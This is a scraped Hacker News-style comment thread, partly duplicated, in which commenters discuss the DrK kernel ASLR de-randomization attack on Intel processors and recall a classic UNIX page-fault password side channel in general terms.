科技回声

8 条评论

Providing user control over page faults and using that for a security exploit reminds me of the classic UNIX tale of password checking. A version of UNIX had a privileged mechanism that would check a password (provided by pointer); it did so character-by-character. It also had a way for userspace processes to handle page faults themselves. So, put a password buffer across two pages, with the page boundary after the first character, and change the first character until you get a page fault. Repeat for each character of the password...

评论 #12798319 未加载

评论 #12797550 未加载

评论 #12798298 未加载

ryuuchin超过 8 年前

So yet another KASLR bypass.Reminds me of[1]:> Consider this our "I told you so" that we hope you'll remember in the coming years as KASLR is "broken" time and again. Then again, in this offensive-driven industry, that's where the money is, isn't it?[1] <a href="https://forums.grsecurity.net/viewtopic.php?f=7&t=3367&sid=ee9f8c1bacede4863bcab77b96eff623" rel="nofollow">https://forums.grsecurity.net/viewtopic.php?f=7&t=3367&sid=e...</a>

评论 #12798351 未加载

评论 #12800106 未加载

评论 #12798474 未加载

josteink超过 8 年前

To me it seems like every time intel tries to create a security safeguard, it almost always without exception ends up being a new attack-vector instead (see "x86 considered harmful").I'd love to run simpler versions of the modern intel cpus stripped of all this insecure bloat.Surely I can't be the only one?

评论 #12797354 未加载

评论 #12797893 未加载

评论 #12798555 未加载

评论 #12799333 未加载

评论 #12798751 未加载

Cyph0n超过 8 年前

I attended a talk on DrK by Yeongjin a few weeks back at Georgia Tech. Keep up the awesome work guys, and welcome to the front page of HN ;)

willvarfar超过 8 年前

(This popped up on proggit the other day, but got deleted for some reason: <a href="https://www.reddit.com/r/programming/comments/58fpi6/aslr_protection_on_intel_haswell_takes_only_60ms/" rel="nofollow">https://www.reddit.com/r/programming/comments/58fpi6/aslr_pr...</a> )

dooglius超过 8 年前

For a system as complex and intricate as a modern processor, it seems impossible to avoid a userspace application from figuring out at least some basic information about the kernel's state. It would be better to focus on avoiding actual privilege escalations.

shamsalmon超过 8 年前

I would have loved for this kind of research to be my job. Should have done better in my classes :(

评论 #12797365 未加载

cheiVia0超过 8 年前

Scary :(

8 条评论

JoshTriplett超过 8 年前

评论 #12798319 未加载

评论 #12797550 未加载

评论 #12798298 未加载

ryuuchin超过 8 年前

评论 #12798351 未加载

评论 #12800106 未加载

评论 #12798474 未加载

josteink超过 8 年前

评论 #12797354 未加载

评论 #12797893 未加载

评论 #12798555 未加载

评论 #12799333 未加载

评论 #12798751 未加载

Cyph0n超过 8 年前

I attended a talk on DrK by Yeongjin a few weeks back at Georgia Tech. Keep up the awesome work guys, and welcome to the front page of HN ;)

willvarfar超过 8 年前

dooglius超过 8 年前

shamsalmon超过 8 年前

I would have loved for this kind of research to be my job. Should have done better in my classes :(

评论 #12797365 未加载

cheiVia0超过 8 年前

Scary :(

The DrK Attack: De-randomizing Kernel ASLR

8 条评论

The DrK Attack: De-randomizing Kernel ASLR

8 条评论